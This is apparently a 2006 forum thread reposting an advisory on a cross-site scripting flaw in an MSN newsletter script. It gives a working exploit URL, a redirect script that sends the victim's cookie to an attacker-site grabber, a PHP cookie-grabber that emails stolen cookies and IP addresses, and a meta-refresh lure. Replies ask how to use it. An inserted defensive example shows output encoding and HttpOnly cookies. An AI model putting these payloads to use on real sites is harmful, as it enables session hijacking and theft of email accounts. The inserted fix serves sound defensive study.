FORUM DARKERS

Security & Hacking => Bugs | Exploits | Vulnerabilities => Topic started by: DarkGenesis on 11 August 2006, 12:29:10 PM

Title: Hotmail/MSN Cross Site Scripting Vulnerability
Post by: DarkGenesis on 11 August 2006, 12:29:10 PM
Hotmail/MSN Cross Site Scripting Vulnerability

Author: Simo64
Contact: simo64_at_morx_dot_org
Discovered: 07/25/2006
Published: 08/10/2006
Vendor: MSN.com
Service: Hotmail.com Webmail Service
Vulnerability: Cross Site Scripting (Cookie-Theft)
Severity: Medium/High
Tested on: IE 6.0, Firefox 1.5 and Opera (should work on all browsers)

Morx Security Research Team
http://www.morx.org


Details:

newsletter.msn.com's insite.asp script is prone to cross-site scripting attacks. This problem is due to a failure in the application to properly sanitize user-supplied input.

Impact:

An attacker can exploit the vulnerable script to have arbitrary script code executed in the browser of an authenticated MSN user in the context of the MSN webpage, resulting in the theft of cookie-based authentication, giving the attacker temporary access to the victim's email account (until the cookie expires - about 24 hours) as well as other types of attacks.



Exploit:

http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script src=http://attacker/redir.js>

Where redir.js code can be:

location.href='http://attacker-site/cookie-grabber.php?cookie='+escape(document.cookie)

and cookie-grabber.php can be:

<?
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("your@email.org", $subject, $msg);

header ("location: http://attacker-site/some-pic.jpg");
?>

The attacker would also use an HTML file to redirect the victim to the XSS location.

As an example of that:

<meta http-equiv="refresh" content="0; url=http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script src=http://attacker/redir.js>">

Disclaimer:

This entire document is for educational, testing and demonstration purposes only. Modification, use and/or publishing of this information is entirely at your OWN risk. The information provided in this advisory is to be used/tested on your OWN machine/account. I cannot be held responsible for any of the above.
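
An added example, not part of the original post or of the vendor's code: the unsanitized reflection the Details paragraph describes, beside an output-encoded version and an HttpOnly session cookie. It assumes RE is echoed into a single-quoted JavaScript string inside an inline script block (inferred from the payload's shape); `go`, the function names and the cookie name are hypothetical.

```javascript
// Added example. Assumption: the RE query parameter is reflected inside a
// single-quoted JavaScript string in an inline <script>; go() is hypothetical.

// Vulnerable form: the raw value is concatenated into the script block.
function renderUnsafe(re) {
  return "<script>go('" + re + "')</script>";
}

// Encode for a JavaScript string literal embedded in HTML: every UTF-16 unit
// that is not an ASCII letter or digit becomes \xHH or \uHHHH, so the value
// cannot close the quote, the call, or the enclosing <script> element.
function jsStringEncode(value) {
  const s = String(value);
  let out = "";
  for (let i = 0; i < s.length; i++) {
    const c = s.charCodeAt(i);
    const alnum = (c >= 48 && c <= 57) || (c >= 65 && c <= 90) || (c >= 97 && c <= 122);
    if (alnum) out += s[i];
    else if (c < 256) out += "\\x" + c.toString(16).padStart(2, "0");
    else out += "\\u" + c.toString(16).padStart(4, "0");
  }
  return out;
}

// Hardened form: same template, encoded value.
function renderSafe(re) {
  return "<script>go('" + jsStringEncode(re) + "')</script>";
}

// Number of <script> elements opened by the rendered markup; more than one
// means the reflected value escaped its string literal.
function scriptTagCount(html) {
  return (html.match(/<script/gi) || []).length;
}

// Defence in depth: HttpOnly keeps the session cookie out of document.cookie,
// so injected script cannot read it. Cookie name and value are constructed.
function sessionCookieHeader(name, value) {
  return name + "=" + encodeURIComponent(value) + "; Path=/; Secure; HttpOnly; SameSite=Lax";
}

// The RE value from the advisory above, used as test input.
const sample = "')></script><script src=http://attacker/redir.js>";
console.log(scriptTagCount(renderUnsafe(sample))); // 2
console.log(scriptTagCount(renderSafe(sample)));   // 1
console.log(sessionCookieHeader("sid", "constructed-value"));
```
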
Title: Re: Hotmail/MSN Cross Site Scripting Vulnerability
Post by: Anonymous on 13 August 2006, 01:15:35 AM
What does this exploit do???
Explain it to me!!!
Thanks
Title: Re: Hotmail/MSN Cross Site Scripting Vulnerability
Post by: DarkGenesis on 13 August 2006, 08:35:53 AM
You steal the victim's cookie, and with a vulnerability in the M$ certificate you can have access to their e-mail for approximately 24 hours, until the cookies expire.
Title: Re: Hotmail/MSN Cross Site Scripting Vulnerability
Post by: OnlyOne on 13 August 2006, 01:16:17 PM
Deleting cookies is the law!!
Title: Re: Hotmail/MSN Cross Site Scripting Vulnerability
Post by: Security on 19 September 2006, 12:59:38 AM
How do I use it?
Can someone give me a little help, pls..
Bye x]
Title: Re: Hotmail/MSN Cross Site Scripting Vulnerability
Post by: insanity on 19 September 2006, 01:28:26 PM
Quote from: "Security"
How do I use it?
Can someone give me a little help, pls..
Bye x]

If you had read the comments, you wouldn't be asking that...

See you later
Title: Re: Hotmail/MSN Cross Site Scripting Vulnerability
Post by: Security on 20 September 2006, 12:25:46 AM
I'm kind of bad at English :/
Where can I learn English well? :P
Bye
Title: Re: Hotmail/MSN Cross Site Scripting Vulnerability
Post by: nizep on 20 September 2006, 09:01:45 PM
Quote from: "Security"
I'm kind of bad at English :/
Where can I learn English well? :P
Bye

http://www.google.com.br/language_tools?hl=pt-BR

Translate it there, dude
Title: Re: Hotmail/MSN Cross Site Scripting Vulnerability
Post by: rog on 21 September 2006, 12:25:28 AM
Interesting

You get the victim to click on a link

http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')>